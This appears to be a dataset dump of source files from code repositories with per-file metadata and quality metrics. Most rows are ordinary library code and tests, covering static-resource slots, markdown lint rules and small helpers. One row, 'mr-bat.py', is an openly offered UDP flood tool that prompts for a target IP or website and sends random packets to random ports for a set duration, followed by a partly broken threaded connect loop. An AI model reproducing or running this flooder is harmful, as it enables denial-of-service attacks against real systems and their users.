hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
73f89d7a5fe0d0c81a167d875bdcdc268a4e2bbe | 5,043 | py | Python | mr-bat.py | Bhai4You/Mr.Bat | 7d3e51a8c7dcd1d62df5622bb0bcb5e067811934 | [
"BSD-2-Clause"
] | 10 | 2019-09-02T07:25:11.000Z | 2021-12-19T09:33:41.000Z | mr-bat.py | Bhai4You/Mr.Bat | 7d3e51a8c7dcd1d62df5622bb0bcb5e067811934 | [
"BSD-2-Clause"
] | null | null | null | mr-bat.py | Bhai4You/Mr.Bat | 7d3e51a8c7dcd1d62df5622bb0bcb5e067811934 | [
"BSD-2-Clause"
] | 8 | 2019-04-16T08:27:00.000Z | 2021-08-04T20:39:16.000Z |
import socket
import random
import os, sys, subprocess,time
import os, sys, json, urllib, re
from time import sleep
os.system("clear")
reload(sys)
sys.setdefaultencoding("utf-8")
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[1m' # bold
RR = '\033[3m' # greencolor
def logo():
print(""" \033[1m\033[33m#\033[31m
\033[33m##\033[31m
###
####
#####
#######
#######
########
########
#########
##########
############
##############
\033[33m#\033[31m###############
################
##############
############## \033[33m####\033[31m
############## #####
############## #######
############## ###########
############### #############
################ ##############
################# \033[33m#\033[31m ################
################## \033[33m## # \033[31m#################
\033[33m#\033[31m################### \033[33m### ## \033[31m#################
################ \033[33m########\033[31m #################
################ \033[33m#######\033[31m ###################
################\033[33m####### \033[31m#####################
################\033[33m#####\033[31m ###################
############################################
###########################################
#########\033[33m##\033[31m###\033[33m##\033[31m##\033[33m#####\033[31m###################
########\033[33m#\033[31m#\033[33m#\033[31m#\033[33m#\033[31m#\033[33m#\033[31m##\033[33m#\033[31m###\033[33m#\033[31m##################
########\033[33m#\033[31m##\033[33m#\033[31m##\033[33m#\033[31m##\033[33m#\033[31m#\033[33m#\033[31m####################
#######\033[33m#\033[31m#####\033[33m#\033[31m##\033[33m#\033[31m###\033[33m#\033[31m#################
######################################
########################## #####
### ################### \033[33m##\033[31m
## ###############
\033[33m#\033[31m ## ########## \033[33mMr \033[31m.\033[33m Bat\033[31m
## ####
###
\033[33m ##\033[31m
\033[33m-by \033[31mS\033[33mutariya \033[31mP\033[33marixit\033[31m \033[33m#\033[31m
\n\t \033[31m\033[1m[_\033[33mIP Flooder\033[31m_]
\n\033[0m\033[1m
\t \033[33m\033[1m[-] \033[0m\033[1mPlatform : \033[33m\033[1mAndroid Termux
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mName : \033[33m\033[1mMr.Bat
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mSite : \033[33mwww.bhai4you.blogspot.com
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mCoded by :\033[1m \033[33m[ \033[32m\033[1mParixit \033[33m ]
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mSec.Code : \033[33m\033[1m8h4i\033[0m
\t \033[1m\033[33m\033[1m[-] \033[0m\033[1mDate : \033[33m\033[1m10-Dec-17\033[0m
""")
logo()
print("\n\n\n\t\t\033[32m\033[1mMr.Bat")
print("\033[33m\033[1m UDP Port Flooder By \033[31m8h4i\033[0m")
attack = raw_input("\n\n\n\033[1mWebsite or IP ==> \033[33m")
print("\n\n\tEnter Flood Size (1-6000) \n")
package = input("\033[0m\033[1mFlood Size ===>\033[33m ")
print("\n\n\tEnter Time Of Flood (sec) \n")
duration = input("\033[0m\033[1mTime (Sec.) ===>\033[33m ")
durclock = (lambda:0, time.clock)[duration > 0]
duration = (1, (durclock() + duration))[duration > 0]
packet = random._urandom(package)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print("Mr.Bat Attack Started on \033[32m%s \033[33mwith \033[32m%s\033[33m bytes for \033[32m%s\033[33m seconds." % (attack, package, duration))
while True:
if (durclock() < duration):
port = random.randint(1, 65535)
sock.sendto(packet, (attack, port))
else:
break
print("\n")
print("\n\033[31m\033[1mFlooding Completed...:D\033[33m\n")
print("Mr.Bat Attack has completed on \033[32m%s\033[33m for \033[32m%s\033[33m seconds by Sutariya Parixit." % (attack, duration))
def connect(i):
try:
sock1 = socket(AF_INET, SOCK_STREAM)
sock1.connect((host, port))
sock1.sendto(packet, (ip,port))
sleep(99)
sock1.close
except:
print(" Your Target Have Been Hacked!!!")
n = 0
while 1:
try:
start_new_thread(connect, (n,))
except:
print "\n\t\t\033[33mYour Target Is Down!!!"
print "\033[32m<+> mr.Bat!! mr.Bat!! mr.Bat!! mr.Bat!! mr.Bat!!"
sleep(0.1)
| 41 | 154 | 0.414832 | 585 | 5,043 | 3.558974 | 0.247863 | 0.167147 | 0.198847 | 0.201729 | 0.355908 | 0.32757 | 0.300672 | 0.269452 | 0.245917 | 0.245917 | 0 | 0.21967 | 0.266111 | 5,043 | 122 | 155 | 41.336066 | 0.34288 | 0.012294 | 0 | 0.130841 | 0 | 0.149533 | 0.763581 | 0.275855 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.046729 | null | null | 0.11215 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fb5ae2c95460d7de42c3a9230ffc9c8ea9b1f5de | 313 | py | Python | renormalizer/model/__init__.py | liwt31/Renormalizer | 123a9d53f4f5f32c0088c255475f0ee60d02c745 | [
"Apache-2.0"
] | null | null | null | renormalizer/model/__init__.py | liwt31/Renormalizer | 123a9d53f4f5f32c0088c255475f0ee60d02c745 | [
"Apache-2.0"
] | null | null | null | renormalizer/model/__init__.py | liwt31/Renormalizer | 123a9d53f4f5f32c0088c255475f0ee60d02c745 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Author: Jiajun Ren <jiajunren0522@gmail.com>
from renormalizer.model.phonon import Phonon
from renormalizer.model.mol import Mol
from renormalizer.model.mlist import MolList, MolList2, ModelTranslator, construct_j_matrix, load_from_dict
from renormalizer.model.ephtable import EphTable
| 39.125 | 107 | 0.814696 | 41 | 313 | 6.121951 | 0.609756 | 0.25498 | 0.334661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.099042 | 313 | 7 | 108 | 44.714286 | 0.868794 | 0.210863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fb84a81f70cc5196376cb27504ffee5649923d90 | 34 | py | Python | src/qibo/callbacks.py | mofeing/qibo | 3eb675ba893bf35f103d41a8a64c86aae9cbf616 | [
"Apache-2.0"
] | 81 | 2020-09-04T10:54:40.000Z | 2021-05-17T13:20:38.000Z | src/qibo/callbacks.py | mofeing/qibo | 3eb675ba893bf35f103d41a8a64c86aae9cbf616 | [
"Apache-2.0"
] | 201 | 2020-08-24T08:41:33.000Z | 2021-05-18T12:23:19.000Z | src/qibo/callbacks.py | mofeing/qibo | 3eb675ba893bf35f103d41a8a64c86aae9cbf616 | [
"Apache-2.0"
] | 20 | 2021-06-11T18:13:09.000Z | 2022-03-28T07:32:09.000Z | from qibo.core.callbacks import *
| 17 | 33 | 0.794118 | 5 | 34 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8375937d69dc11dce3ae3c5c6744fc1159c60450 | 39 | py | Python | echoblog.py | echocho/echoblog | af1d3b361df1fef1e834d311f44e99df7ef72f11 | [
"MIT"
] | null | null | null | echoblog.py | echocho/echoblog | af1d3b361df1fef1e834d311f44e99df7ef72f11 | [
"MIT"
] | null | null | null | echoblog.py | echocho/echoblog | af1d3b361df1fef1e834d311f44e99df7ef72f11 | [
"MIT"
] | null | null | null | #! flask/bin/python
from app import app | 19.5 | 19 | 0.769231 | 7 | 39 | 4.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 39 | 2 | 20 | 19.5 | 0.882353 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
83b4552393a6b8d1fb150e8e13553c00b85f3dc5 | 134 | py | Python | component/parameter/__init__.py | sepal-contrib/se.plan | a534d0f15e371310b6bc483867685f8a21f790c0 | [
"MIT"
] | 5 | 2020-11-06T17:24:57.000Z | 2021-12-21T23:06:22.000Z | component/parameter/__init__.py | sepal-contrib/se.plan | a534d0f15e371310b6bc483867685f8a21f790c0 | [
"MIT"
] | 90 | 2020-11-22T13:19:45.000Z | 2022-02-18T14:00:35.000Z | component/parameter/__init__.py | sepal-contrib/se.plan | a534d0f15e371310b6bc483867685f8a21f790c0 | [
"MIT"
] | 2 | 2020-11-06T17:25:03.000Z | 2021-06-09T23:03:24.000Z | from .file_params import *
from .gui_params import *
from .viz_params import *
from .color_gradient import *
from .directory import *
| 22.333333 | 29 | 0.776119 | 19 | 134 | 5.263158 | 0.473684 | 0.4 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149254 | 134 | 5 | 30 | 26.8 | 0.877193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
f7c437aadd0ec1f61642c252bb5e72481c03c6fe | 4,113 | py | Python | fanstatic/test_slot.py | derilinx/fanstatic | 661ee3619c607aaa4f8c654d0e8093f260cf5288 | [
"BSD-3-Clause"
] | null | null | null | fanstatic/test_slot.py | derilinx/fanstatic | 661ee3619c607aaa4f8c654d0e8093f260cf5288 | [
"BSD-3-Clause"
] | null | null | null | fanstatic/test_slot.py | derilinx/fanstatic | 661ee3619c607aaa4f8c654d0e8093f260cf5288 | [
"BSD-3-Clause"
] | 1 | 2021-08-09T03:23:13.000Z | 2021-08-09T03:23:13.000Z | import pytest
from fanstatic import NeededResources, Library, Resource, Slot, SlotError
def test_fill_slot():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js')
needed.need(a, {slot: b})
resources = needed.resources()
assert len(resources) == 2
# verify filled slot is correctly
assert resources[0].library is b.library
assert resources[0].relpath is b.relpath
def test_dont_fill_required_slot():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js')
needed.need(a)
with pytest.raises(SlotError):
resources = needed.resources()
def test_no_need_to_fill_in_not_required():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js', required=False)
a = Resource(lib, 'a.js', depends=[slot])
needed.need(a)
# slot wasn't required and not filled in, so filled slot doesn't show up
assert needed.resources() == [a]
def test_fill_slot_wrong_extension():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.css')
needed.need(a, {slot: b})
with pytest.raises(SlotError):
resources = needed.resources()
def test_fill_slot_wrong_dependencies():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
c = Resource(lib, 'c.js')
b = Resource(lib, 'b.js', depends=[c])
needed.need(a, {slot: b})
with pytest.raises(SlotError):
resources = needed.resources()
def test_render_filled_slots():
needed = NeededResources()
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js')
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/b.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
def test_slot_depends():
needed = NeededResources()
lib = Library('lib', '')
c = Resource(lib, 'c.js')
slot = Slot(lib, '.js', depends=[c])
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js', depends=[c])
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/c.js"></script>
<script type="text/javascript" src="/fanstatic/lib/b.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
def test_slot_depends_subset():
needed = NeededResources()
lib = Library('lib', '')
c = Resource(lib, 'c.js')
slot = Slot(lib, '.js', depends=[c])
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js', depends=[])
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/c.js"></script>
<script type="text/javascript" src="/fanstatic/lib/b.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
def test_slot_depends_incorrect():
needed = NeededResources()
lib = Library('lib', '')
c = Resource(lib, 'c.js')
slot = Slot(lib, '.js', depends=[c])
a = Resource(lib, 'a.js', depends=[slot])
d = Resource(lib, 'd.js')
b = Resource(lib, 'b.js', depends=[d])
needed.need(a, {slot: b})
with pytest.raises(SlotError):
needed.render()
def test_slot_minified():
needed = NeededResources(minified=True)
lib = Library('lib', '')
slot = Slot(lib, '.js')
a = Resource(lib, 'a.js', depends=[slot])
b = Resource(lib, 'b.js', minified='b-min.js')
needed.need(a, {slot: b})
assert needed.render() == '''\
<script type="text/javascript" src="/fanstatic/lib/b-min.js"></script>
<script type="text/javascript" src="/fanstatic/lib/a.js"></script>'''
| 25.079268 | 76 | 0.605884 | 546 | 4,113 | 4.501832 | 0.115385 | 0.107404 | 0.034174 | 0.052889 | 0.788853 | 0.770138 | 0.770138 | 0.748983 | 0.748983 | 0.690399 | 0 | 0.000914 | 0.202285 | 4,113 | 163 | 77 | 25.233129 | 0.748247 | 0.024799 | 0 | 0.757282 | 0 | 0.009709 | 0.210329 | 0.143214 | 0 | 0 | 0 | 0 | 0.07767 | 1 | 0.097087 | false | 0 | 0.019417 | 0 | 0.116505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
791c95db1d70960b129202b5bb0fc14dfaa1810a | 89 | py | Python | TWLight/comments/__init__.py | jajodiaraghav/TWLight | 22359ab0b95ee3653e8ffa0eb698acd7bb8ebf70 | [
"MIT"
] | 1 | 2019-10-24T04:49:52.000Z | 2019-10-24T04:49:52.000Z | TWLight/comments/__init__.py | jajodiaraghav/TWLight | 22359ab0b95ee3653e8ffa0eb698acd7bb8ebf70 | [
"MIT"
] | 1 | 2019-03-29T15:29:45.000Z | 2019-03-29T15:57:20.000Z | TWLight/comments/__init__.py | jajodiaraghav/TWLight | 22359ab0b95ee3653e8ffa0eb698acd7bb8ebf70 | [
"MIT"
] | 1 | 2019-09-26T14:40:27.000Z | 2019-09-26T14:40:27.000Z | def get_form():
from .forms import CommentWithoutEmail
return CommentWithoutEmail | 29.666667 | 42 | 0.786517 | 9 | 89 | 7.666667 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168539 | 89 | 3 | 43 | 29.666667 | 0.932432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f7169146ec3baeb91915b19f26b91545909663f8 | 149 | py | Python | foundation/migrate.py | shreyashah115/foundation | 42f19d23cfda77bae533f4884aecc15b3cd07f14 | [
"MIT"
] | null | null | null | foundation/migrate.py | shreyashah115/foundation | 42f19d23cfda77bae533f4884aecc15b3cd07f14 | [
"MIT"
] | null | null | null | foundation/migrate.py | shreyashah115/foundation | 42f19d23cfda77bae533f4884aecc15b3cd07f14 | [
"MIT"
] | null | null | null | import frappe
from frappe.database import Database
from markdown2 import markdown
from frappe.utils import validate_email_add
def migrate():
pass
| 16.555556 | 43 | 0.832215 | 21 | 149 | 5.809524 | 0.619048 | 0.163934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007752 | 0.134228 | 149 | 8 | 44 | 18.625 | 0.937985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0.166667 | 0.666667 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
f74bd12d7d4e22137523ec857496b79106d59c37 | 4,636 | py | Python | test/test_md019.py | jackdewinter/pymarkdown | 7ae408ba0b24506fa07552ffe520750bbff38c53 | [
"MIT"
] | 20 | 2021-01-14T17:39:09.000Z | 2022-03-14T08:35:22.000Z | test/test_md019.py | jackdewinter/pymarkdown | 7ae408ba0b24506fa07552ffe520750bbff38c53 | [
"MIT"
] | 304 | 2020-08-15T23:24:00.000Z | 2022-03-31T23:34:03.000Z | test/test_md019.py | jackdewinter/pymarkdown | 7ae408ba0b24506fa07552ffe520750bbff38c53 | [
"MIT"
] | 3 | 2021-08-11T10:26:26.000Z | 2021-11-02T20:41:27.000Z | """
Module to provide tests related to the MD019 rule.
"""
from test.markdown_scanner import MarkdownScanner
import pytest
# pylint: disable=too-many-lines
@pytest.mark.rules
def test_md019_good_single_spacing():
"""
Test to make sure this rule does not trigger with a document that
contains an Atx Heading with a single space before text.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md019/single_spacing.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md019_bad_multiple_spacing():
"""
Test to make sure this rule does not trigger with a document that
contains Atx Headings with multiple spaces before text.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md019/multiple_spacing.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md019/multiple_spacing.md:1:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
"test/resources/rules/md019/multiple_spacing.md:3:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
def test_md019_bad_multiple_spacing_with_inline():
"""
Test to make sure this rule does not trigger with a document that
contains multiple Atx Headings with multiple spaces before text,
including an inline element in the heading.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md019/multiple_spacing_with_inline.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md019/multiple_spacing_with_inline.md:1:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
"test/resources/rules/md019/multiple_spacing_with_inline.md:3:1: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
def test_md019_bad_multiple_spacing_with_indent():
"""
Test to make sure this rule does not trigger with a document that
contains multiple Atx Headings with multiple spaces before text,
including indets.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md023",
"scan",
"test/resources/rules/md019/multiple_spacing_with_indent.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md019/multiple_spacing_with_indent.md:1:2: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
"test/resources/rules/md019/multiple_spacing_with_indent.md:3:3: "
+ "MD019: Multiple spaces are present after hash character on Atx Heading. (no-multiple-space-atx)\n"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
def test_md019_bad_single_space_single_tab():
"""
Test to make sure this rule does not trigger with a document that
contains multiple Atx Headings with tabs before text.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md010",
"scan",
"test/resources/rules/md019/single_space_single_tab.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
| 28.617284 | 109 | 0.690035 | 562 | 4,636 | 5.475089 | 0.153025 | 0.063373 | 0.064348 | 0.082223 | 0.916477 | 0.914202 | 0.880403 | 0.830029 | 0.828729 | 0.80078 | 0 | 0.025563 | 0.223684 | 4,636 | 161 | 110 | 28.795031 | 0.829397 | 0.186799 | 0 | 0.625 | 0 | 0.068182 | 0.346048 | 0.209385 | 0 | 0 | 0 | 0 | 0.056818 | 1 | 0.056818 | false | 0 | 0.022727 | 0 | 0.079545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f764d091b3a085d00802ab7f140d23d2ba7a09fd | 125 | py | Python | 0x04-python-more_data_structures/1-search_replace.py | omarcherni007/holbertonschool-higher_level_programming | 65f3430ab0310f85368d73cb72e139631e8c6f1e | [
"MIT"
] | 1 | 2022-01-04T11:07:56.000Z | 2022-01-04T11:07:56.000Z | 0x04-python-more_data_structures/1-search_replace.py | omarcherni007/holbertonschool-higher_level_programming | 65f3430ab0310f85368d73cb72e139631e8c6f1e | [
"MIT"
] | null | null | null | 0x04-python-more_data_structures/1-search_replace.py | omarcherni007/holbertonschool-higher_level_programming | 65f3430ab0310f85368d73cb72e139631e8c6f1e | [
"MIT"
] | null | null | null | #!/usr/bin/python3
def search_replace(my_list, search, replace):
return [replace if i == search else i for i in my_list]
